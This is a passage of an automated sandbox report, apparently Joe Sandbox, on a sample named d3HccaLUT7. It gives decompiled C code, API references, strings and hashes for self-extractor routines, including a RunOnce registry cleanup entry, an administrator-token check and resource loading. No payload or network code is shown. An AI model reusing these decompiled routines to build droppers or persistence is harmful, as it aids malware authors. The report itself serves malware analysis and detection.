Instruction Fuzzy Hash: 6C317271240301BBD7205F25AE4DF2B3E68E789B42F14493AF642B93F5CA7A8911CA5D

Uniqueness

Uniqueness Score: -1.00%

Function 00404224 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 132
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E00404224(char __ecx) {
				char* _v8;
				_Unknown_base(*)()* _v12;
				_Unknown_base(*)()* _v16;
				_Unknown_base(*)()* _v20;
				char* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v44;
				char _v48;
				char _v52;
				_Unknown_base(*)()* _t26;
				_Unknown_base(*)()* _t28;
				_Unknown_base(*)()* _t29;
				_Unknown_base(*)()* _t32;
				char _t42;
				char* _t44;
				char* _t61;
				void* _t63;
				char* _t65;
				struct HINSTANCE__* _t66;
				char _t67;
				void* _t71;
				char _t76;
				intOrPtr _t85;

				_t67 = __ecx;
				_t66 = LoadLibraryA("SHELL32.DLL");
				if(_t66 == 0) {
					_t63 = 0x4c2;
					L22:
					E004044B9(_t67, _t63, 0, 0, 0x10, 0);
					return 0;
				}
				_t26 = GetProcAddress(_t66, "SHBrowseForFolder");
				_v12 = _t26;
				if(_t26 == 0) {
					L20:
					FreeLibrary(_t66);
					_t63 = 0x4c1;
					goto L22;
				}
				_t28 = GetProcAddress(_t66, 0xc3);
				_v20 = _t28;
				if(_t28 == 0) {
					goto L20;
				}
				_t29 = GetProcAddress(_t66, "SHGetPathFromIDList");
				_v16 = _t29;
				if(_t29 == 0) {
					goto L20;
				}
				_t76 =  *0x4088c0; // 0x0
				if(_t76 != 0) {
					L10:
					 *0x4087a0 = 0;
					_v52 = _t67;
					_v48 = 0;
					_v44 = 0;
					_v40 = 0x408598;
					_v36 = 1;
					_v32 = E00404200;
					_v28 = 0x4088c0;
					 *0x40a288( &_v52);
					_t32 =  *_v12();
					if(_t71 != _t71) {
						asm("int 0x29");
					}
					_v12 = _t32;
					if(_t32 != 0) {
						 *0x40a288(_t32, 0x4088c0);
						 *_v16();
						if(_t71 != _t71) {
							asm("int 0x29");
						}
						if( *0x4088c0 != 0) {
							E00401680(0x4087a0, 0x104, 0x4088c0);
						}
						 *0x40a288(_v12);
						 *_v20();
						if(_t71 != _t71) {
							asm("int 0x29");
						}
					}
					FreeLibrary(_t66);
					_t85 =  *0x4087a0; // 0x0
					return 0 | _t85 != 0x00000000;
				} else {
					GetTempPathA(0x104, 0x4088c0);
					_t61 = 0x4088c0;
					_t4 =  &(_t61[1]); // 0x4088c1
					_t65 = _t4;
					do {
						_t42 =  *_t61;
						_t61 =  &(_t61[1]);
					} while (_t42 != 0);
					_t5 = _t61 - _t65 + 0x4088c0; // 0x811181
					_t44 = CharPrevA(0x4088c0, _t5);
					_v8 = _t44;
					if( *_t44 == 0x5c &&  *(CharPrevA(0x4088c0, _t44)) != 0x3a) {
						 *_v8 = 0;
					}
					goto L10;
				}
			}

0x00404234
0x0040423c
0x00404240
0x004043b2
0x004043b7
0x004043c0
0x00000000
0x004043c5
0x0040424c
0x00404252
0x00404257
0x004043a4
0x004043a5
0x004043ab
0x00000000
0x004043ab
0x00404263
0x00404269
0x0040426e
0x00000000
0x00000000
0x0040427a
0x00404280
0x00404285
0x00000000
0x00000000
0x0040428d
0x00404293
0x004042e6
0x004042e9
0x004042ef
0x004042f4
0x004042f7
0x00404300
0x00404307
0x0040430e
0x00404315
0x0040431c
0x00404322
0x00404326
0x0040432d
0x0040432d
0x0040432f
0x00404334
0x00404343
0x00404349
0x0040434d
0x00404354
0x00404354
0x0040435d
0x0040436e
0x0040436e
0x0040437d
0x00404383
0x00404387
0x0040438e
0x0040438e
0x00404387
0x00404391
0x00404399
0x00000000
0x00404295
0x0040429f
0x004042a5
0x004042aa
0x004042aa
0x004042ad
0x004042ad
0x004042af
0x004042b0
0x004042b6
0x004042c2
0x004042c8
0x004042ce
0x004042e4
0x004042e4
0x00000000
0x004042ce

APIs

LoadLibraryA.KERNEL32(SHELL32.DLL,?,?,00000001), ref: 00404236
GetProcAddress.KERNEL32(00000000,SHBrowseForFolder,?,00000001), ref: 0040424C
GetProcAddress.KERNEL32(00000000,000000C3,?,00000001), ref: 00404263
GetProcAddress.KERNEL32(00000000,SHGetPathFromIDList,?,00000001), ref: 0040427A
GetTempPathA.KERNEL32(00000104,004088C0,?,00000001), ref: 0040429F
CharPrevA.USER32(004088C0,00811181,?,00000001), ref: 004042C2
CharPrevA.USER32(004088C0,00000000,?,00000001), ref: 004042D6
FreeLibrary.KERNEL32(00000000,?,00000001), ref: 00404391
FreeLibrary.KERNEL32(00000000,?,00000001), ref: 004043A5

Strings

SHGetPathFromIDList, xrefs: 00404274
SHELL32.DLL, xrefs: 0040422F
SHBrowseForFolder, xrefs: 00404246

Memory Dump Source

Source File: 00000000.00000002.391523288.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.391523288.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_d3HccaLUT7.jbxd

Similarity

API ID: AddressLibraryProc$CharFreePrev$LoadPathTemp
String ID: SHBrowseForFolder$SHELL32.DLL$SHGetPathFromIDList
API String ID: 1865808269-1731843650
Opcode ID: 62c8c5832672bbbd4f51870b14db4df699431c97bf1b6f77f9cc7bfa0f1f7c63
Instruction ID: 0b25c262f151fa20e67494b359207c62db184f6ba7d2e960933b952b011f601d
Opcode Fuzzy Hash: 62c8c5832672bbbd4f51870b14db4df699431c97bf1b6f77f9cc7bfa0f1f7c63
Instruction Fuzzy Hash: 6841D2B4A00304AFE711AF60DE84A6E7BA4EB85344F54417EEA81B73D1CB7C8D05876D

Uniqueness

Uniqueness Score: -1.00%

Function 00402773 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 114
registryCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E00402773(CHAR* __ecx, char* _a4) {
				signed int _v8;
				char _v268;
				char _v269;
				CHAR* _v276;
				int _v280;
				void* _v284;
				int _v288;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t23;
				intOrPtr _t34;
				int _t45;
				int* _t50;
				CHAR* _t52;
				CHAR* _t61;
				char* _t62;
				int _t63;
				CHAR* _t64;
				signed int _t65;

				_t52 = __ecx;
				_t23 =  *0x408004; // 0x7980a54a
				_v8 = _t23 ^ _t65;
				_t62 = _a4;
				_t50 = 0;
				_t61 = __ecx;
				_v276 = _t62;
				 *((char*)(__ecx)) = 0;
				if( *_t62 != 0x23) {
					_t63 = 0x104;
					goto L14;
				} else {
					_t64 = _t62 + 1;
					_v269 = CharUpperA( *_t64);
					_v276 = CharNextA(CharNextA(_t64));
					_t63 = 0x104;
					_t34 = _v269;
					if(_t34 == 0x53) {
						L14:
						GetSystemDirectoryA(_t61, _t63);
						goto L15;
					} else {
						if(_t34 == 0x57) {
							GetWindowsDirectoryA(_t61, 0x104);
							goto L16;
						} else {
							_push(_t52);
							_v288 = 0x104;
							E00401781( &_v268, 0x104, _t52, "Software\\Microsoft\\Windows\\CurrentVersion\\App Paths");
							_t59 = 0x104;
							E0040658A( &_v268, 0x104, _v276);
							if(RegOpenKeyExA(0x80000002,  &_v268, 0, 0x20019,  &_v284) != 0) {
								L16:
								_t59 = _t63;
								E0040658A(_t61, _t63, _v276);
							} else {
								if(RegQueryValueExA(_v284, 0x401140, 0,  &_v280, _t61,  &_v288) == 0) {
									_t45 = _v280;
									if(_t45 != 2) {
										L9:
										if(_t45 == 1) {
											goto L10;
										}
									} else {
										if(ExpandEnvironmentStringsA(_t61,  &_v268, 0x104) == 0) {
											_t45 = _v280;
											goto L9;
										} else {
											_t59 = 0x104;
											E00401680(_t61, 0x104,  &_v268);
											L10:
											_t50 = 1;
										}
									}
								}
								RegCloseKey(_v284);
								L15:
								if(_t50 == 0) {
									goto L16;
								}
							}
						}
					}
				}
				return E00406CE0(1, _t50, _v8 ^ _t65, _t59, _t61, _t63);
			}

0x00402773
0x0040277e
0x00402785
0x0040278a
0x0040278d
0x00402790
0x00402792
0x00402798
0x0040279d
0x004028b2
0x00000000
0x004027a3
0x004027a3
0x004027af
0x004027c2
0x004027c8
0x004027cd
0x004027d5
0x004028b7
0x004028b9
0x00000000
0x004027db
0x004027dd
0x004028aa
0x00000000
0x004027e3
0x004027e3
0x004027ec
0x004027f8
0x00402803
0x0040280b
0x00402831
0x004028c3
0x004028c9
0x004028cd
0x00402837
0x0040285a
0x0040285c
0x00402865
0x00402892
0x00402895
0x00000000
0x00000000
0x00402867
0x00402878
0x0040288c
0x00000000
0x0040287a
0x00402880
0x00402885
0x00402897
0x00402899
0x00402899
0x00402878
0x00402865
0x004028a0
0x004028bf
0x004028c1
0x00000000
0x00000000
0x004028c1
0x00402831
0x004027dd
0x004027d5
0x004028e5

APIs

CharUpperA.USER32(7980A54A,00000000,00000000,00000000), ref: 004027A8
CharNextA.USER32(0000054D), ref: 004027B5
CharNextA.USER32(00000000), ref: 004027BC
RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00402829
RegQueryValueExA.ADVAPI32(?,00401140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00402852
ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00402870
RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 004028A0
GetWindowsDirectoryA.KERNEL32(-00000005,00000104), ref: 004028AA
GetSystemDirectoryA.KERNEL32(-00000005,00000104), ref: 004028B9

Strings

Software\Microsoft\Windows\CurrentVersion\App Paths, xrefs: 004027E4

Memory Dump Source

Source File: 00000000.00000002.391523288.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.391523288.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_d3HccaLUT7.jbxd

Similarity

API ID: Char$DirectoryNext$CloseEnvironmentExpandOpenQueryStringsSystemUpperValueWindows
String ID: Software\Microsoft\Windows\CurrentVersion\App Paths
API String ID: 2659952014-2428544900
Opcode ID: e046747f357c46f050dce2852b115ef3c86e064c1e2556bd9d83d58dfc6506bf
Instruction ID: b29046f07952b478a6343dcd1b107d04b4820205fbcf11bc0dc1fa30adae9d17
Opcode Fuzzy Hash: e046747f357c46f050dce2852b115ef3c86e064c1e2556bd9d83d58dfc6506bf
Instruction Fuzzy Hash: FA41F87590012C6FDB249F549D49AEA77BCEF15300F0080BAF945F2190CBB44E968FA9

Uniqueness

Uniqueness Score: -1.00%

Function 00402267 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 88
registryCOMMON

Download Yara Rule

C-Code - Quality: 62%

			E00402267() {
				signed int _v8;
				char _v268;
				char _v836;
				void* _v840;
				int _v844;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t19;
				intOrPtr _t33;
				void* _t38;
				intOrPtr* _t42;
				void* _t45;
				void* _t47;
				void* _t49;
				signed int _t51;

				_t19 =  *0x408004; // 0x7980a54a
				_t20 = _t19 ^ _t51;
				_v8 = _t19 ^ _t51;
				if( *0x408530 != 0) {
					_push(_t49);
					if(RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x2001f,  &_v840) == 0) {
						_push(_t38);
						_v844 = 0x238;
						if(RegQueryValueExA(_v840, ?str?, 0, 0,  &_v836,  &_v844) == 0) {
							_push(_t47);
							memset( &_v268, 0, 0x104);
							if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
								E0040658A( &_v268, 0x104, 0x401140);
							}
							_push("C:\Users\jones\AppData\Local\Temp\IXP000.TMP\");
							E0040171E( &_v836, 0x238, "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"",  &_v268);
							_t42 =  &_v836;
							_t45 = _t42 + 1;
							_pop(_t47);
							do {
								_t33 =  *_t42;
								_t42 = _t42 + 1;
							} while (_t33 != 0);
							RegSetValueExA(_v840, "wextract_cleanup0", 0, 1,  &_v836, _t42 - _t45 + 1);
						}
						_t20 = RegCloseKey(_v840);
						_pop(_t38);
					}
					_pop(_t49);
				}
				return E00406CE0(_t20, _t38, _v8 ^ _t51, _t45, _t47, _t49);
			}

0x00402272
0x00402277
0x00402279
0x00402283
0x00402289
0x004022ab
0x004022b1
0x004022c4
0x004022e0
0x004022e6
0x004022f5
0x0040230d
0x0040231c
0x0040231c
0x00402321
0x0040233a
0x00402342
0x00402348
0x0040234b
0x0040234c
0x0040234c
0x0040234e
0x0040234f
0x0040236e
0x0040236e
0x0040237a
0x00402380
0x00402380
0x00402381
0x00402381
0x0040238f

APIs

RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,0002001F,?,00000001), ref: 004022A3
RegQueryValueExA.ADVAPI32(?,wextract_cleanup0,00000000,00000000,?,?,00000001), ref: 004022D8
memset.MSVCRT ref: 004022F5
GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00402305
RegSetValueExA.ADVAPI32(?,wextract_cleanup0,00000000,00000001,?,?,?,?,?,?,?,?,?), ref: 0040236E
RegCloseKey.ADVAPI32(?), ref: 0040237A

Strings

C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00402321
wextract_cleanup0, xrefs: 0040227C, 004022CD, 00402363
rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s", xrefs: 0040232D
Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 00402299

Memory Dump Source

Source File: 00000000.00000002.391523288.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.391523288.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_d3HccaLUT7.jbxd

Similarity

API ID: Value$CloseDirectoryOpenQuerySystemmemset
String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$Software\Microsoft\Windows\CurrentVersion\RunOnce$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup0
API String ID: 3027380567-2036266374
Opcode ID: 247cee02729445f1a6684307d51db0c04144f96146b3de10c2f9ee9ee34981a8
Instruction ID: 8d6967f2b6b69c3bcd6c1b378378b2e216aa965ec765d16025e56e3eb759036c
Opcode Fuzzy Hash: 247cee02729445f1a6684307d51db0c04144f96146b3de10c2f9ee9ee34981a8
Instruction Fuzzy Hash: 2E31C871A002186BDB219F61DD49FDB777CEB54704F0001FAB94DB61D1DA786F88CA54

Uniqueness

Uniqueness Score: -1.00%

Function 00403100 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 70
windowCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E00403100(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
				void* _t8;
				void* _t11;
				void* _t15;
				struct HWND__* _t16;
				struct HWND__* _t33;
				struct HWND__* _t34;

				_t8 = _a8 - 0xf;
				if(_t8 == 0) {
					if( *0x408590 == 0) {
						SendDlgItemMessageA(_a4, 0x834, 0xb1, 0xffffffff, 0);
						 *0x408590 = 1;
					}
					L13:
					return 0;
				}
				_t11 = _t8 - 1;
				if(_t11 == 0) {
					L7:
					_push(0);
					L8:
					EndDialog(_a4, ??);
					L9:
					return 1;
				}
				_t15 = _t11 - 0x100;
				if(_t15 == 0) {
					_t16 = GetDesktopWindow();
					_t33 = _a4;
					E004043D0(_t33, _t16);
					SetDlgItemTextA(_t33, 0x834,  *0x408d4c);
					SetWindowTextA(_t33, "doza2");
					SetForegroundWindow(_t33);
					_t34 = GetDlgItem(_t33, 0x834);
					 *0x4088b8 = GetWindowLongA(_t34, 0xfffffffc);
					SetWindowLongA(_t34, 0xfffffffc, E004030C0);
					return 1;
				}
				if(_t15 != 1) {
					goto L13;
				}
				if(_a12 != 6) {
					if(_a12 != 7) {
						goto L9;
					}
					goto L7;
				}
				_push(1);
				goto L8;
			}

0x00403108
0x0040310b
0x004031b7
0x004031ca
0x004031d0
0x004031d0
0x004031da
0x00000000
0x004031da
0x00403111
0x00403114
0x00403136
0x00403136
0x00403138
0x0040313b
0x00403141
0x00000000
0x00403143
0x00403116
0x0040311b
0x0040314b
0x00403151
0x00403158
0x0040316a
0x00403176
0x0040317d
0x0040318b
0x0040319e
0x004031a3
0x00000000
0x004031ad
0x00403120
0x00000000
0x00000000
0x0040312a
0x00403134
0x00000000
0x00000000
0x00000000
0x00403134
0x0040312c
0x00000000

APIs

EndDialog.USER32(?,00000000), ref: 0040313B
GetDesktopWindow.USER32 ref: 0040314B
SetDlgItemTextA.USER32(?,00000834), ref: 0040316A
SetWindowTextA.USER32(?,doza2), ref: 00403176
SetForegroundWindow.USER32(?), ref: 0040317D
GetDlgItem.USER32(?,00000834), ref: 00403185
GetWindowLongA.USER32(00000000,000000FC), ref: 00403190
SetWindowLongA.USER32(00000000,000000FC,004030C0), ref: 004031A3
SendDlgItemMessageA.USER32(?,00000834,000000B1,000000FF,00000000), ref: 004031CA

Strings

doza2, xrefs: 00403170

Memory Dump Source

Source File: 00000000.00000002.391523288.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.391523288.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_d3HccaLUT7.jbxd

Similarity

API ID: Window$Item$LongText$DesktopDialogForegroundMessageSend
String ID: doza2
API String ID: 3785188418-612509477
Opcode ID: 867529428936b8af0a001c92f2b8928eb253d54033c5a874c9100fdf34310dde
Instruction ID: 246b5d21e6c1ac9ca4eb47d67caf4067a6fe804b44cd1f9aeadbe74bb776ad20
Opcode Fuzzy Hash: 867529428936b8af0a001c92f2b8928eb253d54033c5a874c9100fdf34310dde
Instruction Fuzzy Hash: B911B131204211BBDB115F64AE0CB5B3E68EB4E722F100636F855B92E0DBB89A51C78E

Uniqueness

Uniqueness Score: -1.00%

Function 004018A3 Relevance: 16.6, APIs: 11, Instructions: 112
memoryCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E004018A3(void* __edx, void* __esi) {
				signed int _v8;
				short _v12;
				struct _SID_IDENTIFIER_AUTHORITY _v16;
				char _v20;
				long _v24;
				void* _v28;
				void* _v32;
				void* __ebx;
				void* __edi;
				signed int _t23;
				long _t45;
				void* _t49;
				int _t50;
				void* _t52;
				signed int _t53;

				_t51 = __esi;
				_t49 = __edx;
				_t23 =  *0x408004; // 0x7980a54a
				_v8 = _t23 ^ _t53;
				_t25 =  *0x408128; // 0x2
				_t45 = 0;
				_v12 = 0x500;
				_t50 = 2;
				_v16.Value = 0;
				_v20 = 0;
				if(_t25 != _t50) {
					L20:
					return E00406CE0(_t25, _t45, _v8 ^ _t53, _t49, _t50, _t51);
				}
				if(E004017EE( &_v20) != 0) {
					_t25 = _v20;
					if(_v20 != 0) {
						 *0x408128 = 1;
					}
					goto L20;
				}
				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v28) == 0) {
					goto L20;
				}
				if(GetTokenInformation(_v28, _t50, 0, 0,  &_v24) != 0 || GetLastError() != 0x7a) {
					L17:
					CloseHandle(_v28);
					_t25 = _v20;
					goto L20;
				} else {
					_push(__esi);
					_t52 = LocalAlloc(0, _v24);
					if(_t52 == 0) {
						L16:
						_pop(_t51);
						goto L17;
					}
					if(GetTokenInformation(_v28, _t50, _t52, _v24,  &_v24) == 0 || AllocateAndInitializeSid( &_v16, _t50, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v32) == 0) {
						L15:
						LocalFree(_t52);
						goto L16;
					} else {
						if( *_t52 <= 0) {
							L14:
							FreeSid(_v32);
							goto L15;
						}
						_t15 = _t52 + 4; // 0x4
						_t50 = _t15;
						while(EqualSid( *_t50, _v32) == 0) {
							_t45 = _t45 + 1;
							_t50 = _t50 + 8;
							if(_t45 <  *_t52) {
								continue;
							}
							goto L14;
						}
						 *0x408128 = 1;
						_v20 = 1;
						goto L14;
					}
				}
			}

0x004018a3
0x004018a3
0x004018ab
0x004018b2
0x004018b5
0x004018be
0x004018c0
0x004018c6
0x004018c7
0x004018ca
0x004018cf
0x004019c9
0x004019d8
0x004019d8
0x004018df
0x004019b8
0x004019bd
0x004019bf
0x004019bf
0x00000000
0x004019bd
0x004018fa
0x00000000
0x00000000
0x00401912
0x004019aa
0x004019ad
0x004019b3
0x00000000
0x00401927
0x00401927
0x00401932
0x00401936
0x004019a9
0x004019a9
0x00000000
0x004019a9
0x0040194c
0x004019a2
0x004019a3
0x00000000
0x0040196e
0x00401970
0x00401999
0x0040199c
0x00000000
0x0040199c
0x00401972
0x00401972
0x00401975
0x00401984
0x00401985
0x0040198a
0x00000000
0x00000000
0x00000000
0x0040198c
0x00401991
0x00401996
0x00000000
0x00401996
0x0040194c

APIs

Part of subcall function 004017EE: LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,004018DD), ref: 0040181A
Part of subcall function 004017EE: GetProcAddress.KERNEL32(00000000,CheckTokenMembership,?,?,?,004018DD), ref: 0040182C
Part of subcall function 004017EE: AllocateAndInitializeSid.ADVAPI32(004018DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,004018DD), ref: 00401855
Part of subcall function 004017EE: FreeSid.ADVAPI32(?,?,?,?,004018DD), ref: 00401883
Part of subcall function 004017EE: FreeLibrary.KERNEL32(00000000,?,?,?,004018DD), ref: 0040188A

GetCurrentProcess.KERNEL32(00000008,?,00000000,00000001), ref: 004018EB
OpenProcessToken.ADVAPI32(00000000), ref: 004018F2
GetTokenInformation.ADVAPI32(?,00000002,00000000,00000000,?), ref: 0040190A
GetLastError.KERNEL32 ref: 00401918
LocalAlloc.KERNEL32(00000000,?,?), ref: 0040192C
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?), ref: 00401944
AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00401964
EqualSid.ADVAPI32(00000004,?), ref: 0040197A
FreeSid.ADVAPI32(?), ref: 0040199C
LocalFree.KERNEL32(00000000), ref: 004019A3
CloseHandle.KERNEL32(?), ref: 004019AD

Memory Dump Source

Source File: 00000000.00000002.391523288.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.391523288.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_d3HccaLUT7.jbxd

Similarity

API ID: Free$Token$AllocateInformationInitializeLibraryLocalProcess$AddressAllocCloseCurrentEqualErrorHandleLastLoadOpenProc
String ID:
API String ID: 2168512254-0
Opcode ID: 301c52f797cbd35a8e8b94abf9be9750f60c30641f2852762fecb15bbadc3fda
Instruction ID: 25d17cb087145c015d5063b66ab4b84c81c4c11853c483eeef0c9c8ad6c8a379
Opcode Fuzzy Hash: 301c52f797cbd35a8e8b94abf9be9750f60c30641f2852762fecb15bbadc3fda
Instruction Fuzzy Hash: 2F312DB1A00209AFDB109FA5DD98AAFBBBCFF48704F50043AE545F61A0D7389915CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0040468F Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E0040468F(CHAR* __ecx, void* __edx, intOrPtr _a4) {
				long _t4;
				void* _t11;
				CHAR* _t14;
				void* _t15;
				long _t16;

				_t14 = __ecx;
				_t11 = __edx;
				_t4 = SizeofResource(0, FindResourceA(0, __ecx, 0xa));
				_t16 = _t4;
				if(_t16 <= _a4 && _t11 != 0) {
					if(_t16 == 0) {
						L5:
						return 0;
					}
					_t15 = LockResource(LoadResource(0, FindResourceA(0, _t14, 0xa)));
					if(_t15 == 0) {
						goto L5;
					}
					__imp__memcpy_s(_t11, _a4, _t15, _t16);
					FreeResource(_t15);
					return _t16;
				}
				return _t4;
			}

0x00404699
0x0040469b
0x004046a9
0x004046af
0x004046b4
0x004046bc
0x004046f9
0x00000000
0x004046f9
0x004046d9
0x004046dd
0x00000000
0x00000000
0x004046e5
0x004046ef
0x00000000
0x004046f5
0x004046ff

APIs

FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 004046A0
SizeofResource.KERNEL32(00000000,00000000,?,00402D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 004046A9
FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 004046C3
LoadResource.KERNEL32(00000000,00000000,?,00402D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 004046CC
LockResource.KERNEL32(00000000,?,00402D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 004046D3
memcpy_s.MSVCRT ref: 004046E5
FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 004046EF

Strings

doza2, xrefs: 004046E4
TITLE, xrefs: 0040469D, 004046C0

Memory Dump Source

Source File: 00000000.00000002.391523288.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.391523288.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_d3HccaLUT7.jbxd

Similarity

API ID: Resource$Find$FreeLoadLockSizeofmemcpy_s
String ID: TITLE$doza2
API String ID: 3370778649-4167907646
Opcode ID: 735a035723e9c89e979ff7554535d7cc5c2412197345818d6819b7f6aae81ff3
Instruction ID: 79f0873ee19441588a253031faa3d29a4edaeb9cce06827ffb284520bab3e3ef
Opcode Fuzzy Hash: 735a035723e9c89e979ff7554535d7cc5c2412197345818d6819b7f6aae81ff3
Instruction Fuzzy Hash: B801F9722403047BE3101BA59D0CF2B3E2CDBC6F51F044435FB49B7280D9B6886192BE

Uniqueness

Uniqueness Score: -1.00%

Function 0040681F Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 81
registryCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E0040681F(void* __ebx) {
				signed int _v8;
				char _v20;
				struct _OSVERSIONINFOA _v168;
				void* _v172;
				int* _v176;
				int _v180;
				int _v184;
				void* __edi;
				void* __esi;
				signed int _t19;
				long _t31;
				signed int _t35;
				void* _t36;
				intOrPtr _t41;
				signed int _t44;

				_t36 = __ebx;
				_t19 =  *0x408004; // 0x7980a54a
				_v8 = _t19 ^ _t44;
				_t41 =  *0x4081d8; // 0x0
				_t43 = 0;
				_v180 = 0xc;
				_v176 = 0;
				if(_t41 == 0xfffffffe) {
					 *0x4081d8 = 0;
					_v168.dwOSVersionInfoSize = 0x94;
					if(GetVersionExA( &_v168) == 0) {
						L12:
						_t41 =  *0x4081d8; // 0x0
					} else {
						_t41 = 1;
						if(_v168.dwPlatformId != 1 || _v168.dwMajorVersion != 4 || _v168.dwMinorVersion >= 0xa || GetSystemMetrics(0x4a) == 0 || RegOpenKeyExA(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x20019,  &_v172) != 0) {
							goto L12;
						} else {
							_t31 = RegQueryValueExA(_v172, 0x401140, 0,  &_v184,  &_v20,  &_v180);
							_t43 = _t31;
							RegCloseKey(_v172);
							if(_t31 != 0) {
								goto L12;
							} else {
								_t40 =  &_v176;
								if(E004066F9( &_v20,  &_v176) == 0) {
									goto L12;
								} else {
									_t35 = _v176 & 0x000003ff;
									if(_t35 == 1 || _t35 == 0xd) {
										 *0x4081d8 = _t41;
									} else {
										goto L12;
									}
								}
							}
						}
					}
				}
				_t18 =  &_v8; // 0x40463b
				return E00406CE0(_t41, _t36,  *_t18 ^ _t44, _t40, _t41, _t43);
			}

0x0040681f
0x0040682a
0x00406831
0x00406836
0x0040683c
0x0040683e
0x00406848
0x00406851
0x0040685d
0x00406864
0x00406876
0x0040693a
0x0040693a
0x0040687c
0x0040687e
0x00406885
0x00000000
0x004068d6
0x004068f4
0x00406900
0x00406902
0x0040690a
0x00000000
0x0040690c
0x0040690c
0x0040691c
0x00000000
0x0040691e
0x00406924
0x0040692b
0x00406932
0x00000000
0x00000000
0x00000000
0x0040692b
0x0040691c
0x0040690a
0x00406885
0x00406876
0x00406940
0x00406951

APIs

GetVersionExA.KERNEL32(?,00000000,00000002), ref: 0040686E
GetSystemMetrics.USER32(0000004A), ref: 004068A7
RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 004068CC
RegQueryValueExA.ADVAPI32(?,00401140,00000000,?,?,0000000C), ref: 004068F4
RegCloseKey.ADVAPI32(?), ref: 00406902

Part of subcall function 004066F9: CharNextA.USER32(?,00000001,00000000,00000000,?,?,?,0040691A), ref: 00406741

Strings

Control Panel\Desktop\ResourceLocale, xrefs: 004068C2
;F@, xrefs: 00406940

Memory Dump Source

Source File: 00000000.00000002.391523288.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.391523288.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_d3HccaLUT7.jbxd

Similarity

API ID: CharCloseMetricsNextOpenQuerySystemValueVersion
String ID: ;F@$Control Panel\Desktop\ResourceLocale
API String ID: 3346862599-4093955092
Opcode ID: 34cef6a5a546b334fac7b65d37dafabe7fca2f16954090be01d47ee25951021f
